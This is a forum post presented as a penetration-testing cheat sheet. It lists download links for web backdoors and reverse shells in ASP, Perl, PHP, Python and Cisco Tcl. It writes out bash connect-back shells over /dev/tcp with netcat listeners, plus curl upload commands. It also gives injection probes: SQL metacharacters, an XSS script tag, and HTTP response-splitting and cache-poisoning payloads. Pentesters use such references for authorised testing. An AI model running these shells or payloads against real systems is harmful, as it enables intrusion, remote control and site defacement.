Jump to content
Sign in to follow this  
BiosHell

Penetration Testing Framework

Recommended Posts

Install Backdoors

ASP

http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt

Assorted

http://michaeldaw.org/projects/web-backdoor-compilation/

http://open-labs.org/hacker_webkit02.tar.gz

Perl

http://home.arcor.de/mschierlm/test/pmsh.pl

http://pentestmonkey.net/tools/perl-reverse-shell/

http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz

PHP

http://php.spb.ru/remview/

http://pentestmonkey.net/tools/php-reverse-shell/

http://pentestmonkey.net/tools/php-findsock-shell/

Python

http://matahari.sourceforge.net/

TCL

http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes

Bash Connect Back Shell

GnuCitizen

Atttack Box: nc -l -p Port -vvv

Victim: $ exec 5<>/dev/tcp/IP_Address/Port

Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

Neohapsis

Atttack Box: nc -l -p Port -vvv

Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin

Victim: $ exec 1>&0 # Next we copy stdin to stdout

Victim: $ exec 2>&0 # And finally stdin to stderr

Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0

Method Testing

nc IP_Adress Port

HEAD / HTTP/1.0

OPTIONS / HTTP/1.0

PROPFIND / HTTP/1.0

TRACE / HTTP/1.1

PUT http://Target_URL/FILE_NAME

POST http://Target_URL/FILE_NAME HTTP/1.x

Upload Files

curl

curl -u <username:password> -T file_to_upload <Target_URL>

curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>

put.pl

put.pl -h target -r /remote_file_name -f local_file_name

webdav

cadaver

View Page Source

Hidden Values

Developer Remarks

Extraneous Code

Passwords!

Input Validation Checks

NULL or null

Possible error messages returned.

' , " , ; , <!

Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.

– , = , + , "

Used to craft SQL Injection queries.

‘ , &, ! , ¦ , < , >

Used to find command execution vulnerabilities.

"><script>alert(1)</script>

Basic Cross-Site Scripting Checks.

%0d%0a

Carriage Return (%0d) Line Feed (%0a)

HTTP Splitting

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>

i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>

Cache Poisoning

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>

And many more :)

Reference Link : http://www.vulnerabilityassessment.co.uk/Penetration Test.html

  • Upvote 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...